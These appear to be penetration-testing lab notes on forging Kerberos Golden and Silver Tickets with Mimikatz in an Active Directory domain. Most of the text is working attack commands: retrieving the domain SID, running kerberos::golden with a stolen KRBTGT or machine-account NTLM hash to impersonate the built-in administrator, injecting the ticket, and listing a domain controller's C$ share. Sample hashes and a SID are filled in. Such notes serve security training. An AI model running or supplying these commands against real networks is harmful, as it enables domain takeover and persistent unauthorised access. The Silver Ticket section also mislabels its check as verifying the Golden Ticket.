Golden Ticket
With November 2021 Security Updates for Kerberos this attack method was Patched so if the Domain Controllers have this Update a Valid User must be Used.
To generate the Golden Ticket
we need the NTLM Hash of the KRBTGT
Account and the Domain SID.
# We can use this Command to find the Domain SID
Get-ADDomain
Once we recover the Domain SID we can load Mimikatz
to generate the Golden Ticket
.
:: [admin] - Username we want to Impersonate.
:: [domain] - FQDN of the Domain we want to generate the Ticket.
:: [id] - User RID. By Default, Mimikatz uses RID 500, which is the Default Administrator account RID.
:: [sid] - SID of the Domain we want to generate the Ticket.
:: [krbtgt] - NTLM hash of the KRBTGT Account.
:: [endin] - Ticket Lifetime. By default, Mimikatz generates a Ticket that is valid for 10 Years. The default Kerberos Policy of AD is 10 Hours (600 Minutes).
:: [renewmax] - Maximum Ticket Lifetime with Renewal. By default, Mimikatz generates a Ticket that is valid for 10 Years. The default Kerberos Policy of AD is 7 Days (10080 Minutes).
:: [ptt] - This Flag tells Mimikatz to Inject the Ticket directly into the Session, meaning it is ready to be used.
kerberos::golden /admin:<Username> /domain:za.adobe.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM Hash of KRBTGT Account> /endin:600 /renewmax:10080 /ptt
:: Query Example
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.adobe.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /krbtgt:16f9af38fca3ada405386b3b57366082 /endin:600 /renewmax:10080 /ptt
We can verify that the Golden Ticket
is Working by running the dir - klist
Command against the Domain Controller.
:: List Domain Controller Contents
dir \\PCDC.za.adobe.loc\c$\
:: Displays a list of currently Cached Kerberos Tickets
klist
Silver Ticket
Even if the Golden Ticket has an incredibly long time, the Blue Team can still defend against this by simply rotating the KRBTGT
Password Twice. The Silver Tickets
are less likely to be Discovered and significantly Harder to Defend against since the Passwords of every Machine Account must be Rotated.
We can use Mimikatz
to Generate a Silver Ticket
.
:: [admin] - Username we want to Impersonate.
:: [domain] - FQDN of the Domain we want to generate the Ticket.
:: [id] - User RID. By Default, Mimikatz uses RID 500, which is the Default Administrator account RID.
:: [sid] - SID of the Domain we want to generate the Ticket.
:: [target] - Hostname of the Target Server. It can be any Domain-Joined Host.
:: [rc4] - NTLM Hash of the Machine Account of our Target.
:: [service] - The Service we are Requesting in our TGS. (CIFS is a safe bet, since it allows File Access)
:: [ptt] - This Flag tells Mimikatz to Inject the Ticket directly into the Session, meaning it is ready to be used.
kerberos::golden /admin:<Username> /domain:za.adobe.loc /id:500 /sid:<Domain SID> /target:<Hostname of Server being Targeted> /rc4:<NTLM Hash of Machine Account of Target> /service:cifs /ptt
:: Query Example
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.adobe.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /target:PCMC.za.adobe.loc /rc4:4b091b72ce2eefece6494ee0f1bb874a /service:cifs /ptt
We can verify that the Golden Ticket
is Working by running the dir - klist
Command against the Target Machine, in this case PCMC.za.adobe.loc
:: List Target Machine Contents
dir \\PCMC.za.adobe.loc\c$\
:: Displays a list of currently Cached Kerberos Tickets
klist